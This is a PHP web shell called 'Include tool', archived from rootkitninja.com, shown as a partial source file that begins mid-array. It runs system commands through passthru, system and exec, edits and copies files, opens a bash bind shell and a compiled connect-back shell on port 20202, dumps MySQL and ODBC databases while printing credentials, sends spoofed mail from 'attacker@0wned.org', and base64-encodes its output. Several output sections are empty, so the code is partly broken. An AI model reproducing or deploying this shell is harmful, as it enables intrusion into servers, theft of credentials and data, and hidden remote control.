0,
"filecopy" => 0,
"fileedit" => 0,
"showsource" => 0,
"snoop" => 0,
"cmdln" => 0,
"connectback" => 0,
"phpshell" => 0,
"servicecheck" => 0,
"mysqlaccess" => 0,
"mail" => 0,
"env" => 0,
"phpenv" => 0,
"phpinfo" => 0,
"dumpvars" => 0,
"debugscript" => 0,
"syslog" => 0
);
# init navigation
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;
# set default values
$ArrDefaults = array(
"filecopy_source" => "http://...",
"filecopy_dest" => getcwd(),
"cmdcall" => "",
"editfile" => getcwd(),
"editcontent" => "",
"chdir" => ".",
"vsource" => $SCRIPT_FILENAME,
"mail_from" => "attacker@0wned.org",
"mail_to" => "",
"mail_subject" => "",
"mail_attach_source" => "http://....",
"mail_attach_appear" => "filename...",
"mail_content_type" => "image/png",
"mail_msg" => "",
"tcpports" => "21 22 23 25 80 110",
"timeout" => 5,
"miniinc_loc" => getcwd() . "/miniinc.php",
"incdbhost" => "localhost",
"cbhost" => $_SERVER['REMOTE_ADDR'],
"cbport" => 20202,
"cbtempdir" => "/tmp",
"cbcompiler" => "gcc",
"phpshellapp" => "export TERM=xterm; bash -i",
"phpshellhost" => "0.0.0.0",
"phpshellport" => "20202"
);
# init defaults
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;
# define executable functions
$Mstr = array(
0 => "No execute functions available!",
1 => "passthru()",
2 => "system()",
3 => "backticks",
4 => "proc_open()",
5 => "exec()"
);
# clean request to avoid uri monster
$SREQ = "";
$reqdat = array();
$tmpCount=0;
foreach($REQUESTS as $key => $val){
if($tmpCount==0) $reqdat[] = $key."=".$val;
else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
$tmpCount++;
}
$SREQ = implode("&", $reqdat);
$tmpCount=0;
if($SREQ=="") {
$tmp_req = array();
$tmp_qry = explode("&", $QUERY_STRING);
foreach($tmp_qry as $key => $val) {
$tmp_val = explode("=", $val);
if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
$tmpCount++;
}
$SREQ = implode("&", $tmp_req);
}
if(isset($path['docroot'])) $SREQ .= "&path;[docroot]=" . $path['docroot'];
# set some defaults to avaoid errors
$is_file = array();
$is_dir = array();
$is_w_dir = array();
$is_w_file = array();
$emeth=0;
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
$chdir = str_replace("//", "/", $chdir);
if(substr($chdir, -1) != "/") $chdir .= "/";
##
# Setup wether to use PHP_SELF or SCRIPT_NAME
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
else $MyLoc = $SCRIPT_NAME;
# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
# This is a list of internal inc.inc vars that do not get displayed
# inside the dumpvars function (poss for a debug func later?)
$DebugArr = array(
'ARHGFDGFGASDFG',
'safe_mode',
'register_globals',
'magic_quotes_gpc',
'txt',
'lang',
'SM',
'RG',
'MQ',
'ArrFuncs',
'val',
'key',
'env',
'phpenv',
'phpinfo',
'debugscript',
'filecopy',
'fileedit',
'showsource',
'snoop',
'mail',
'cmdln',
'syslog',
'servicecheck',
'dropinc',
'mysqlaccess',
'ArrDefaults',
'filecopy_source',
'filecopy_dest',
'cmdcall',
'editfile',
'editcontent',
'chdir',
'vsource',
'mail_from',
'mail_to',
'mail_subject',
'mail_attach_source',
'mail_attach_appear',
'mail_content_type',
'mail_msg',
'tcpports',
'timeout',
'miniinc_loc',
'incdbhost',
'Mstr',
'SREQ',
'reqdat',
'tmpCount',
'is_file',
'is_dir',
'is_w_dir',
'is_w_file',
'emeth',
'MyLoc',
'dumpvarsare',
'DebugArr',
'cbtempdir',
'cbcompiler',
'cbhost',
'cbport',
'phpshelltype',
'phpshellapp',
'phpshellhost',
'phpshellport'
);
# activate syslog entry
if($syslog == 1)
{
# openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
# drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
}
###############################################################################
#
# start include output
#
###############################################################################
$strOutput = "";
$strOutput .= "
COLLECTED BY
Organization:
Alexa Crawls
Starting in 1996,
Alexa Internet has been donating their crawl data to the Internet Archive. Flowing in every day, these data are added to the
Wayback Machine after an embargo period.
Starting in 1996,
Alexa Internet has been donating their crawl data to the Internet Archive. Flowing in every day, these data are added to the
Wayback Machine after an embargo period.
The Wayback Machine - https://web.archive.org/web/20191224170204/http://rootkitninja.com:80/sheller/includeshell.txt
Include tool
PHP Version: " . phpversion() . " |
safe_mode: $SM |
register_globals: $RG |
magic_quotes_gpc: $MQ |
syslogging: ";
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
$strOutput .= "
";
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key);
###############################################################################
# test cmd shell environment
###############################################################################
if($env == 1) {
$strOutput .= "
cmd infos |
test using pwd | "; $emeth =& test_cmd_shell(); $strOutput .= " | ";
if($emeth==0) {
$strOutput .= "$Mstr[$emeth] | ";
} else {
$strOutput .= "exec method | $Mstr[$emeth] |
uname -a | " . Mexec("uname -a", $emeth) . " |
id | " . Mexec("id", $emeth) . " |
";
}
}
###############################################################################
# test php environment
###############################################################################
if($phpenv == 1) {
$strOutput .= "php short infos |
posix infos | ";
if(function_exists('posix_uname')) {
$posix_uname = posix_uname();
while (list($info, $value) = each ($posix_uname)) {
$strOutput .= " $info | $value | ";
}
} else {
$strOutput .= "posix_uname not available";
}
$strOutput .= "current script user | " . get_current_user() . " | ";
if(function_exists('posix_getuid')) $strOutput .= " getuid | " . posix_getuid() . " | ";
else $strOutput .= "posix_getuid not available";
if(function_exists('posix_geteuid')) $strOutput .= " geteuid | " . posix_geteuid() . " | ";
else $strOutput .= "posix_geteuid not available";
if(function_exists('posix_getgid')) $strOutput .= " getgid | " . posix_getgid() . " | ";
else $strOutput .= "posix_getgid not available";
$strOutput .= " ";
}
###############################################################################
# dump variables
###############################################################################
if($dumpvars == 1) {
$strOutput .= "dump variables |
" . dd("GLOBALS") . " |
";
}
###############################################################################
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($debugscript == 1) { ?>
debug script |
ddb("DebugArr"); ?>
|
}
###############################################################################
# copy file
###############################################################################
if($filecopy == 1) {
$strOutput .= "";
}
###############################################################################
# edit file
###############################################################################
if($fileedit == 1) {
$strOutput .= "
";
}
###############################################################################
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($cmdln == 1) {
$emeth = test_cmd_shell();
$strOutput .= "";
}
###############################################################################
# sending mime mail
###############################################################################
if($mail == 1) {
$strOutput .= "";
}
###############################################################################
# drop mini inc handling
###############################################################################
if($dropinc == 1) {
if($loc!="") $miniinc_loc = $loc;
$strOutput .= "";
}
###############################################################################
# connect C back shell handling
###############################################################################
if($connectback == 1) {
$strOutput .= "";
}
###############################################################################
# PHP shell handling
###############################################################################
if($phpshell == 1) {
$strOutput .= "";
}
###############################################################################
# snooping
###############################################################################
if($snoop == 1) {
$strOutput .= "";
}
###############################################################################
# show highlited source
###############################################################################
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
$strOutput .= "";
}
###############################################################################
# service check
###############################################################################
if($servicecheck == 1) {
if($servhost!="") $host = $servhost;
else $host = "localhost";
$strOutput .= "";
}
###############################################################################
# show phpinfo
###############################################################################
if($phpinfo == 1){
phpinfo();
}
######################################################################
# db stuff
######################################################################
if($mysqlaccess == 1) {
$strOutput .= "";
}
if($incdbhost!="" && $incdbuser!="") {
if($incdbvar!="") $dbh = $incdbhost;
else $dbH = $incdbhost;
$dbu = $incdbuser;
$dbp = $incdbpass;
if($incdbsql!="") $dbs = $incdbsql;
if($incdbname!="") $dbn = $incdbname;
if($incdbtable!="") $dbt = $incdbtable;
if($incdbfile!="") $dumpfile = $incdbfile;
}
if(isset($dbh)) {
$strOutput .= "mysql access | ";
eval("\$Gdbhost = \"\$$dbh\";");
eval("\$Gdbuser = \"\$$dbu\";");
eval("\$Gdbpass = \"\$$dbp\";");
eval("\$Gdbname = \"\$$dbn\";");
$strOutput .= "";
if($dbn=="") {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
" | " .
display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
} else if(isset($dbs)) {
$Gdbsql = $dbs;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." sql=".$Gdbsql .
" | ";
if(isset($dumpfile)) {
$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
} else {
$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
}
} else if(isset($dbt)) {
$Gdbtabl = $dbt;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
$strOutput .= " | ";
if(isset($dumpfile)) {
$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);
} else {
$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
}
} else {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
" | " .
display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
}
$strOutput .= " |
";
}
if(isset($dbH)) {
$strOutput .= "mysql access | ";
if($dbn=="") {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
" | ".
display_dbs($dbH, $dbu, $dbp);
} else if(isset($dbs)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." sql=".$dbs.
" | ";
if(isset($dumpfile)) {
$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
} else {
$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
}
} else if(isset($dbt)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
$strOutput .= " | ";
if(isset($dumpfile)) {
$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);
} else {
$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
}
} else {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
" | " .
display_tables($dbH, $dbu, $dbp, $dbn);
}
$strOutput .= " |
";
}
if(isset($Odbh)) {
$strOutput .= "odbc access | ";
eval("\$Gdbhost = \"\$$Odbh\";");
eval("\$Gdbuser = \"\$$dbu\";");
eval("\$Gdbpass = \"\$$dbp\";");
eval("\$Gdbname = \"\$$dbn\";");
$strOutput .= "";
if(isset($dbt)) {
$Gdbtabl = $dbt;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
" | " .
display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
} else {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
" | " .
Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
}
$strOutput .= " |
";
}
if(isset($OdbH)) {
$strOutput .= "odbc access | ";
if(isset($dbt)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
" | " .
Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
} else {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
" | " .
Odisplay_tables($OdbH, $dbu, $dbp);
}
$strOutput .= " |
";
}
$strOutput .= " |
";
$strOutputB64 = chunk_split(base64_encode($strOutput));
echo "\n";
echo '